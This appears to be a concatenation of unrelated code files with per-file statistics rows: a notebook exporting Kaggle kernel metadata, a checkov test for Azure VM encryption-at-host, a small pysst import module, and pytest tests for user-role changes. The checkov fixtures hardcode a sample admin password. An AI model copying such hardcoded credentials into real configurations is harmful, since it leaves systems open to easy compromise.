" <td>2355967</td>\n",
" <td>6658417.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>6658388.0</td>\n",
" <td>0.0</td>\n",
" <td>my-first-data-science-homework</td>\n",
" <td>NaN</td>\n",
" <td>70</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201980</th>\n",
" <td>1916605</td>\n",
" <td>1977282</td>\n",
" <td>6818544.0</td>\n",
" <td>NaN</td>\n",
" <td>69150.0</td>\n",
" <td>6660859.0</td>\n",
" <td>0.0</td>\n",
" <td>u-s-democrat-and-republican-tweet-exploration</td>\n",
" <td>NaN</td>\n",
" <td>82</td>\n",
" <td>2</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" </tbody>\n",
"</table>\n",
"<p>201981 rows × 13 columns</p>\n",
"</div>"
],
"text/plain": [
" Id AuthorUserId CurrentKernelVersionId \\\n",
"0 1 2505 205.0 \n",
"1 2 3716 1748.0 \n",
"2 4 3716 41.0 \n",
"3 5 28963 19.0 \n",
"4 6 3716 21.0 \n",
"5 7 3716 48.0 \n",
"6 9 3716 50.0 \n",
"7 11 3716 373.0 \n",
"8 12 993 6467.0 \n",
"9 13 993 6468.0 \n",
"10 14 993 269065.0 \n",
"11 15 993 520.0 \n",
"12 16 993 154.0 \n",
"13 17 993 649.0 \n",
"14 20 993 803.0 \n",
"15 21 993 1227.0 \n",
"16 22 206545 190.0 \n",
"17 23 114978 193.0 \n",
"18 24 114978 308.0 \n",
"19 25 993 213.0 \n",
"20 26 993 212.0 \n",
"21 27 993 294.0 \n",
"22 29 114978 238.0 \n",
"23 30 9679 236.0 \n",
"24 31 185835 261.0 \n",
"25 32 19605 244.0 \n",
"26 33 319768 253.0 \n",
"27 34 28963 19064.0 \n",
"28 35 320040 264.0 \n",
"29 39 319893 552.0 \n",
"... ... ... ... \n",
"201951 1875333 442623 6498125.0 \n",
"201952 1875398 1497793 6497141.0 \n",
"201953 1875414 2080166 6494175.0 \n",
"201954 1875417 1776773 6499806.0 \n",
"201955 1915910 498422 6657552.0 \n",
"201956 1915916 2080166 6655493.0 \n",
"201957 1915988 1660833 6656526.0 \n",
"201958 1916035 1179427 6661990.0 \n",
"201959 1916052 1828058 6730922.0 \n",
"201960 1916057 1601569 6730437.0 \n",
"201961 1916068 1267737 6656222.0 \n",
"201962 1916091 756325 6656455.0 \n",
"201963 1916101 1090244 6690675.0 \n",
"201964 1916124 1170777 6805081.0 \n",
"201965 1916181 2386017 6660035.0 \n",
"201966 1916199 2108937 6938214.0 \n",
"201967 1916215 637434 6904698.0 \n",
"201968 1916243 885589 6895750.0 \n",
"201969 1916268 1113072 6941531.0 \n",
"201970 1916283 885589 6684908.0 \n",
"201971 1916285 885589 6681010.0 \n",
"201972 1916310 2080166 6657002.0 \n",
"201973 1916350 2092403 6671885.0 \n",
"201974 1916366 2225268 6670628.0 \n",
"201975 1916461 2080166 6657685.0 \n",
"201976 1916539 1162757 6659497.0 \n",
"201977 1916566 1270421 6658657.0 \n",
"201978 1916572 2373215 6658820.0 \n",
"201979 1916595 2355967 6658417.0 \n",
"201980 1916605 1977282 6818544.0 \n",
"\n",
" ForkParentKernelVersionId ForumTopicId FirstKernelVersionId \\\n",
"0 NaN 0.0 1.0 \n",
"1 NaN 26670.0 2.0 \n",
"2 NaN 0.0 9.0 \n",
"3 NaN 0.0 13.0 \n",
"4 NaN 0.0 15.0 \n",
"5 NaN 0.0 27.0 \n",
"6 NaN 0.0 49.0 \n",
"7 NaN 0.0 54.0 \n",
"8 NaN 0.0 55.0 \n",
"9 NaN 0.0 73.0 \n",
"10 NaN 14925.0 77.0 \n",
"11 NaN 20068.0 140.0 \n",
"12 NaN 0.0 141.0 \n",
"13 NaN 18337.0 155.0 \n",
"14 NaN 0.0 171.0 \n",
"15 NaN 17462.0 185.0 \n",
"16 NaN 0.0 188.0 \n",
"17 NaN 0.0 191.0 \n",
"18 NaN 0.0 194.0 \n",
"19 NaN 0.0 209.0 \n",
"20 NaN 0.0 212.0 \n",
"21 NaN 35477.0 214.0 \n",
"22 NaN 0.0 216.0 \n",
"23 NaN 0.0 236.0 \n",
"24 NaN 0.0 239.0 \n",
"25 NaN 0.0 244.0 \n",
"26 NaN 0.0 253.0 \n",
"27 NaN 0.0 262.0 \n",
"28 NaN 0.0 263.0 \n",
"29 NaN 0.0 321.0 \n",
"... ... ... ... \n",
"201951 NaN 0.0 6495275.0 \n",
"201952 2395222.0 0.0 6497049.0 \n",
"201953 NaN 0.0 6494175.0 \n",
"201954 NaN 0.0 6498408.0 \n",
"201955 6528403.0 0.0 6655666.0 \n",
"201956 NaN 0.0 6655493.0 \n",
"201957 NaN 0.0 6655878.0 \n",
"201958 NaN 0.0 6661990.0 \n",
"201959 NaN 0.0 6656151.0 \n",
"201960 6633328.0 0.0 6668207.0 \n",
"201961 NaN 0.0 6656222.0 \n",
"201962 NaN 69117.0 6656455.0 \n",
"201963 NaN 0.0 6656399.0 \n",
"201964 6632919.0 0.0 6805081.0 \n",
"201965 NaN 0.0 6659703.0 \n",
"201966 NaN 0.0 6657733.0 \n",
"201967 6600035.0 69362.0 6657640.0 \n",
"201968 6601958.0 0.0 6656920.0 \n",
"201969 NaN 69337.0 6658725.0 \n",
"201970 6601958.0 0.0 6657006.0 \n",
"201971 6601958.0 0.0 6657012.0 \n",
"201972 NaN 0.0 6657002.0 \n",
"201973 NaN 69316.0 6659016.0 \n",
"201974 NaN 0.0 6657409.0 \n",
"201975 NaN 0.0 6657685.0 \n",
"201976 NaN 0.0 6659320.0 \n",
"201977 NaN 0.0 6658657.0 \n",
"201978 1847749.0 0.0 6658820.0 \n",
"201979 NaN 0.0 6658388.0 \n",
"201980 NaN 69150.0 6660859.0 \n",
"\n",
" IsProjectLanguageTemplate \\\n",
"0 0.0 \n",
"1 0.0 \n",
"2 0.0 \n",
"3 0.0 \n",
"4 0.0 \n",
"5 0.0 \n",
"6 0.0 \n",
"7 0.0 \n",
"8 0.0 \n",
"9 0.0 \n",
"10 0.0 \n",
"11 0.0 \n",
"12 0.0 \n",
"13 0.0 \n",
"14 0.0 \n",
"15 0.0 \n",
"16 0.0 \n",
"17 0.0 \n",
"18 0.0 \n",
"19 0.0 \n",
"20 0.0 \n",
"21 0.0 \n",
"22 0.0 \n",
"23 0.0 \n",
"24 0.0 \n",
"25 0.0 \n",
"26 0.0 \n",
"27 0.0 \n",
"28 0.0 \n",
"29 0.0 \n",
"... ... \n",
"201951 0.0 \n",
"201952 0.0 \n",
"201953 0.0 \n",
"201954 0.0 \n",
"201955 0.0 \n",
"201956 0.0 \n",
"201957 0.0 \n",
"201958 0.0 \n",
"201959 0.0 \n",
"201960 0.0 \n",
"201961 0.0 \n",
"201962 0.0 \n",
"201963 0.0 \n",
"201964 0.0 \n",
"201965 0.0 \n",
"201966 0.0 \n",
"201967 0.0 \n",
"201968 0.0 \n",
"201969 0.0 \n",
"201970 0.0 \n",
"201971 0.0 \n",
"201972 0.0 \n",
"201973 0.0 \n",
"201974 0.0 \n",
"201975 0.0 \n",
"201976 0.0 \n",
"201977 0.0 \n",
"201978 0.0 \n",
"201979 0.0 \n",
"201980 0.0 \n",
"\n",
" CurrentUrlSlug Medal TotalViews \\\n",
"0 hello NaN 24 \n",
"1 rf-proximity 3.0 7547 \n",
"2 r-version NaN 9 \n",
"3 test1 NaN 9 \n",
"4 are-icons-missing NaN 7 \n",
"5 testing-version-bolding NaN 13 \n",
"6 testing-version-bolding-with-new-script NaN 2 \n",
"7 as-raster NaN 2 \n",
"8 whoops-doing-this-logged-in-under-my-own-name NaN 6 \n",
"9 installed-packages NaN 6 \n",
"10 installed-r-packages NaN 7921 \n",
"11 example-handwritten-digits 3.0 29080 \n",
"12 mean-digits NaN 9 \n",
"13 pixel-mean-and-variances-by-digit NaN 9989 \n",
"14 random-forest-benchmark-tree-4 NaN 7 \n",
"15 random-forest-benchmark-1 2.0 52294 \n",
"16 dougg-test NaN 164 \n",
"17 some-basic-stats NaN 230 \n",
"18 rotate-all-the-features NaN 2491 \n",
"19 running-system-commands NaN 0 \n",
"20 running-system-commands-1 NaN 84 \n",
"21 we-have-imagemagick-installed NaN 685 \n",
"22 randombananaclassifier NaN 766 \n",
"23 mytest NaN 124 \n",
"24 peek-data NaN 1064 \n",
"25 example-r NaN 337 \n",
"26 testo NaN 58 \n",
"27 python NaN 7 \n",
"28 digit-recognizer NaN 142 \n",
"29 digit-recognizer-using-knn NaN 717 \n",
"... ... ... ... \n",
"201951 project-euler-21 NaN 18 \n",
"201952 ny-stock-price-prediction-rnn-lstm-gru-eb2000 NaN 37 \n",
"201953 starter-banknote-f2165545-1 NaN 0 \n",
"201954 lightgbm-automated-feature-engineering-easy NaN 57 \n",
"201955 a3-demo-decision-trees NaN 29 \n",
"201956 starter-twitter-worlds2018-0cb7d034-3 NaN 3 \n",
"201957 starter-twitter-worlds2018 NaN 39 \n",
"201958 tutorial-linear-regression NaN 22 \n",
"201959 mks-proteins NaN 208 \n",
"201960 exploration-of-f1-dataset-1102f3-aaf5b9 NaN 41 \n",
"201961 fraud-detection NaN 17 \n",
"201962 google-customer-revenue-prediction NaN 239 \n",
"201963 diabeticretinopathyvgg16-finetuning NaN 144 \n",
"201964 protein-atlas-exploration-and-baseline NaN 17 \n",
"201965 01-iris-species NaN 36 \n",
"201966 chicago-crime-investigation NaN 71 \n",
"201967 cnn-128x128x4-keras-from-scratch-lb-0-328 2.0 1808 \n",
"201968 transforma-o-de-vari-veis NaN 117 \n",
"201969 apply-t-sne-on-news 3.0 907 \n",
"201970 redu-o-de-dimensionalidade NaN 43 \n",
"201971 clusteriza-o NaN 33 \n",
"201972 starter-twitter-data-4e7ab639-b NaN 2 \n",
"201973 how-to-score-0-0255-0-0245-top-10-score NaN 552 \n",
"201974 house-price-xgboost NaN 11 \n",
"201975 starter-twitter-sentiment-analysis-f08e9d52-d NaN 4 \n",
"201976 mnist-with-fastai-style NaN 6 \n",
"201977 a-begining-try NaN 31 \n",
"201978 getting-started-in-r-first-steps-337898 NaN 4 \n",
"201979 my-first-data-science-homework NaN 70 \n",
"201980 u-s-democrat-and-republican-tweet-exploration NaN 82 \n",
"\n",
" TotalComments TotalVotes LanguageName \n",
"0 0 0 1 \n",
"1 1 12 1 \n",
"2 0 0 1 \n",
"3 0 0 1 \n",
"4 0 0 1 \n",
"5 0 0 1 \n",
"6 0 0 1 \n",
"7 0 0 1 \n",
"8 0 0 1 \n",
"9 0 0 1 \n",
"10 2 6 1 \n",
"11 8 36 1 \n",
"12 0 0 1 \n",
"13 5 8 1 \n",
"14 0 0 1 \n",
"15 23 91 1 \n",
"16 0 0 1 \n",
"17 0 0 1 \n",
"18 0 4 1 \n",
"19 0 0 1 \n",
"20 0 0 1 \n",
"21 1 0 1 \n",
"22 0 1 1 \n",
"23 0 0 1 \n",
"24 0 0 1 \n",
"25 0 0 1 \n",
"26 0 0 1 \n",
"27 0 0 1 \n",
"28 0 0 1 \n",
"29 0 0 1 \n",
"... ... ... ... \n",
"201951 0 1 2 \n",
"201952 0 0 2 \n",
"201953 0 0 2 \n",
"201954 0 1 2 \n",
"201955 0 0 2 \n",
"201956 0 0 2 \n",
"201957 0 1 2 \n",
"201958 0 0 2 \n",
"201959 0 0 1 \n",
"201960 0 0 2 \n",
"201961 0 0 2 \n",
"201962 3 3 2 \n",
"201963 0 1 2 \n",
"201964 0 0 2 \n",
"201965 0 1 2 \n",
"201966 0 0 2 \n",
"201967 15 36 2 \n",
"201968 0 13 2 \n",
"201969 7 15 2 \n",
"201970 0 1 2 \n",
"201971 0 1 2 \n",
"201972 0 0 2 \n",
"201973 2 10 2 \n",
"201974 0 0 2 \n",
"201975 0 0 2 \n",
"201976 0 0 2 \n",
"201977 0 0 2 \n",
"201978 0 0 1 \n",
"201979 0 2 2 \n",
"201980 2 4 1 \n",
"\n",
"[201981 rows x 13 columns]"
]
},
"execution_count": 21,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"df['ForumTopicId'].fillna(0,inplace=True)\n",
"df"
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {
"scrolled": true
},
"outputs": [
{
"data": {
"text/html": [
"<div>\n",
"<style scoped>\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"</style>\n",
"<table border=\"1\" class=\"dataframe\">\n",
" <thead>\n",
" <tr style=\"text-align: right;\">\n",
" <th></th>\n",
" <th>Id</th>\n",
" <th>AuthorUserId</th>\n",
" <th>CurrentKernelVersionId</th>\n",
" <th>ForkParentKernelVersionId</th>\n",
" <th>ForumTopicId</th>\n",
" <th>FirstKernelVersionId</th>\n",
" <th>IsProjectLanguageTemplate</th>\n",
" <th>CurrentUrlSlug</th>\n",
" <th>Medal</th>\n",
" <th>TotalViews</th>\n",
" <th>TotalComments</th>\n",
" <th>TotalVotes</th>\n",
" <th>LanguageName</th>\n",
" </tr>\n",
" </thead>\n",
" <tbody>\n",
" <tr>\n",
" <th>0</th>\n",
" <td>1</td>\n",
" <td>2505</td>\n",
" <td>205.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>1.0</td>\n",
" <td>0.0</td>\n",
" <td>hello</td>\n",
" <td>NaN</td>\n",
" <td>24</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>1</th>\n",
" <td>2</td>\n",
" <td>3716</td>\n",
" <td>1748.0</td>\n",
" <td>NaN</td>\n",
" <td>26670.0</td>\n",
" <td>2.0</td>\n",
" <td>0.0</td>\n",
" <td>rf-proximity</td>\n",
" <td>3.0</td>\n",
" <td>7547</td>\n",
" <td>1</td>\n",
" <td>12</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>2</th>\n",
" <td>4</td>\n",
" <td>3716</td>\n",
" <td>41.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>9.0</td>\n",
" <td>0.0</td>\n",
" <td>r-version</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>3</th>\n",
" <td>5</td>\n",
" <td>28963</td>\n",
" <td>19.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>13.0</td>\n",
" <td>0.0</td>\n",
" <td>test1</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>4</th>\n",
" <td>6</td>\n",
" <td>3716</td>\n",
" <td>21.0</td>\n",
" <td>NaN</td>\n",
" <td>0.0</td>\n",
" <td>15.0</td>\n",
" <td>0.0</td>\n",
" <td>are-icons-missing</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" </tbody>\n",
"</table>\n",
"</div>"
],
"text/plain": [
" Id AuthorUserId CurrentKernelVersionId ForkParentKernelVersionId \\\n",
"0 1 2505 205.0 NaN \n",
"1 2 3716 1748.0 NaN \n",
"2 4 3716 41.0 NaN \n",
"3 5 28963 19.0 NaN \n",
"4 6 3716 21.0 NaN \n",
"\n",
" ForumTopicId FirstKernelVersionId IsProjectLanguageTemplate \\\n",
"0 0.0 1.0 0.0 \n",
"1 26670.0 2.0 0.0 \n",
"2 0.0 9.0 0.0 \n",
"3 0.0 13.0 0.0 \n",
"4 0.0 15.0 0.0 \n",
"\n",
" CurrentUrlSlug Medal TotalViews TotalComments TotalVotes \\\n",
"0 hello NaN 24 0 0 \n",
"1 rf-proximity 3.0 7547 1 12 \n",
"2 r-version NaN 9 0 0 \n",
"3 test1 NaN 9 0 0 \n",
"4 are-icons-missing NaN 7 0 0 \n",
"\n",
" LanguageName \n",
"0 1 \n",
"1 1 \n",
"2 1 \n",
"3 1 \n",
"4 1 "
]
},
"execution_count": 22,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"#Export\n",
"df.to_csv('../Datasets/KernelsCleaned.csv',index=False)\n",
"kern = pd.read_csv('../Datasets/KernelsCleaned.csv')\n",
"kern.head()"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 2
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython2",
"version": "2.7.15rc1"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 39.778599 | 132 | 0.273597 | 18,856 | 172,122 | 2.495227 | 0.032457 | 0.155834 | 0.239745 | 0.115154 | 0.953815 | 0.936642 | 0.929054 | 0.923422 | 0.918852 | 0.918108 | 0 | 0.199311 | 0.524483 | 172,122 | 4,326 | 133 | 39.787795 | 0.375506 | 0 | 0 | 0.943366 | 0 | 0.000462 | 0.725009 | 0.068318 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.000693 | 0 | 0.000693 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
2a9e4d3fc94455c2401ed3f1657bd61cf415a639 | 10,039 | py | Python | tests/terraform/checks/resource/azure/test_VMEncryptionAtHostEnabled.py | jamesholland-uk/checkov | d73fd4bd7096d48ab3434a92a177bcc55605460a | [
"Apache-2.0"
] | 4,013 | 2019-12-09T13:16:54.000Z | 2022-03-31T14:31:01.000Z | tests/terraform/checks/resource/azure/test_VMEncryptionAtHostEnabled.py | jamesholland-uk/checkov | d73fd4bd7096d48ab3434a92a177bcc55605460a | [
"Apache-2.0"
] | 1,258 | 2019-12-17T09:55:51.000Z | 2022-03-31T19:17:17.000Z | tests/terraform/checks/resource/azure/test_VMEncryptionAtHostEnabled.py | jamesholland-uk/checkov | d73fd4bd7096d48ab3434a92a177bcc55605460a | [
"Apache-2.0"
] | 638 | 2019-12-19T08:57:38.000Z | 2022-03-30T21:38:37.000Z | import unittest
import hcl2
from checkov.terraform.checks.resource.azure.VMEncryptionAtHostEnabled import check
from checkov.common.models.enums import CheckResult
class TestVMEncryptionAtHostEnabled(unittest.TestCase):
def test_failure1(self):
hcl_res = hcl2.loads("""
resource "azurerm_windows_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_windows_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure2(self):
hcl_res = hcl2.loads("""
resource "azurerm_windows_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
encryption_at_host_enabled = false
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_windows_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure3(self):
hcl_res = hcl2.loads("""
resource "azurerm_linux_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_linux_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure4(self):
hcl_res = hcl2.loads("""
resource "azurerm_linux_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
encryption_at_host_enabled = false
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_linux_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success1(self):
hcl_res = hcl2.loads("""
resource "azurerm_windows_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
encryption_at_host_enabled = true
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_windows_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
def test_success2(self):
hcl_res = hcl2.loads("""
resource "azurerm_linux_virtual_machine_scale_set" "example" {
name = "example-vmss"
resource_group_name = azurerm_resource_group.example.name
location = azurerm_resource_group.example.location
sku = "Standard_F2"
instances = 1
admin_password = "P@55w0rd1234!"
admin_username = "adminuser"
encryption_at_host_enabled = true
source_image_reference {
publisher = "MicrosoftWindowsServer"
offer = "WindowsServer"
sku = "2016-Datacenter-Server-Core"
version = "latest"
}
os_disk {
storage_account_type = "Standard_LRS"
caching = "ReadWrite"
}
network_interface {
name = "example"
primary = true
ip_configuration {
name = "internal"
primary = true
subnet_id = azurerm_subnet.internal.id
}
}
} """)
resource_conf = hcl_res['resource'][0]['azurerm_linux_virtual_machine_scale_set']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
if __name__ == '__main__':
unittest.main()
| 40.808943 | 102 | 0.465983 | 733 | 10,039 | 6.043656 | 0.132333 | 0.052822 | 0.051467 | 0.059594 | 0.937246 | 0.937246 | 0.937246 | 0.937246 | 0.937246 | 0.937246 | 0 | 0.018172 | 0.468274 | 10,039 | 245 | 103 | 40.97551 | 0.811727 | 0 | 0 | 0.822967 | 0 | 0 | 0.83076 | 0.163961 | 0 | 0 | 0 | 0 | 0.028708 | 1 | 0.028708 | false | 0.038278 | 0.019139 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2afffe8cb483012e4f4fa5a8e0f8298388ad61cd | 117 | py | Python | pysst/steps/__init__.py | mjgorman/pysst | b260e711ea114bad652ba67ba4ea4e4fb17d5c81 | [
"MIT"
] | null | null | null | pysst/steps/__init__.py | mjgorman/pysst | b260e711ea114bad652ba67ba4ea4e4fb17d5c81 | [
"MIT"
] | null | null | null | pysst/steps/__init__.py | mjgorman/pysst | b260e711ea114bad652ba67ba4ea4e4fb17d5c81 | [
"MIT"
] | null | null | null | from pysst.steps.shared_steps import *
from pysst.steps.nmap_steps import *
from pysst.steps.requests_steps import *
| 29.25 | 40 | 0.820513 | 18 | 117 | 5.166667 | 0.388889 | 0.290323 | 0.451613 | 0.430108 | 0.537634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 117 | 3 | 41 | 39 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
63014363bc6b71954eab877a2f06fac0918ca66a | 4,872 | py | Python | tests/app/main/roles/test_roles.py | awtrimpe/socks-chat | 46d67a2b448337ab88371905695267449a30580e | [
"MIT"
] | null | null | null | tests/app/main/roles/test_roles.py | awtrimpe/socks-chat | 46d67a2b448337ab88371905695267449a30580e | [
"MIT"
] | 1 | 2020-02-14T15:10:32.000Z | 2020-03-02T15:21:33.000Z | tests/app/main/roles/test_roles.py | awtrimpe/socks-chat | 46d67a2b448337ab88371905695267449a30580e | [
"MIT"
] | null | null | null | import pytest
from app.main.database.tables import Permission, UserPermission
from app.main.roles import change_user_permission, set_user_permission
from app.main.users import register_user
def describe_set_user_permission():
def test_set_user_permission(session, client):
with session() as session:
user = register_user(
session, 'diageo', 'St._Jamess_Gate_Dublin', 'Arthur', 'Guinness')
session.add(user)
session.commit()
perm = set_user_permission(session, 'admin', user.id)
session.add(perm)
session.commit()
admin_perm = session.query(
Permission).filter_by(name='admin').first()
user_perm = session.query(UserPermission).filter_by(
user_id=user.id).first()
assert user_perm.permission_id == admin_perm.id
def test_set_user_permission_first_user(session, client):
with session() as session:
user = register_user(
session, 'diageo', 'St._Jamess_Gate_Dublin', 'Arthur', 'Guinness')
session.add(user)
session.commit()
# First user must be the admin
perm = set_user_permission(session, 'user', user.id)
session.add(perm)
session.commit()
admin_perm = session.query(
Permission).filter_by(name='admin').first()
user_perm = session.query(UserPermission).filter_by(
user_id=user.id).first()
assert user_perm.permission_id == admin_perm.id
def test_set_user_permission_multiple_users(session, client):
with session() as session:
user = register_user(
session, 'diageo', 'St._Jamess_Gate_Dublin', 'Arthur', 'Guinness')
session.add(user)
session.commit()
perm = set_user_permission(session, 'admin', user.id)
session.add(perm)
session.commit()
admin_perm = session.query(
Permission).filter_by(name='admin').first()
user_perm = session.query(UserPermission).filter_by(
user_id=user.id).first()
assert admin_perm.id == user_perm.permission_id
new_user_2 = register_user(
session, 'anheuserbusch', 'DillyDilly', 'Bud', 'Light')
session.add(new_user_2)
session.commit()
perm_2 = set_user_permission(session, 'user', new_user_2.id)
session.add(perm_2)
session.commit()
user_permission = session.query(
Permission).filter_by(name='user').first()
user2_perm = session.query(UserPermission).filter_by(
user_id=new_user_2.id).first()
assert user_permission.id == user2_perm.permission_id
def describe_change_user_permission():
def test_change_second_user(session, client):
with session() as session:
new_user_1 = register_user(
session, 'sabmiller', 'ColdAsTheRockies', 'Coors', 'Light')
session.add(new_user_1)
session.commit()
perm = set_user_permission(session, 'admin', new_user_1.id)
session.add(perm)
session.commit()
new_user_2 = register_user(
session, 'anheuserbusch', 'DillyDilly', 'Bud', 'Light')
session.add(new_user_2)
session.commit()
perm_2 = set_user_permission(session, 'user', new_user_2.id)
session.add(perm_2)
session.commit()
user_permission = session.query(
Permission).filter_by(name='user').first()
admin_permission = session.query(
Permission).filter_by(name='admin').first()
user_perm_2 = session.query(UserPermission).filter_by(
user_id=new_user_2.id).first()
assert user_perm_2.permission_id == user_permission.id
change_user_permission(session, new_user_2.id)
session.commit()
assert user_perm_2.permission_id == admin_permission.id
change_user_permission(session, new_user_2.id)
session.commit()
assert user_perm_2.permission_id == user_permission.id
def test_change_only_admin(session, client):
with session() as session:
user = register_user(
session, 'diageo', 'St._Jamess_Gate_Dublin', 'Arthur', 'Guinness')
session.add(user)
session.commit()
perm = set_user_permission(session, 'admin', user.id)
session.add(perm)
session.commit()
with pytest.raises(Exception) as exc:
change_user_permission(session, user.id)
assert str(exc.value) == 'Cannot remove last admin'
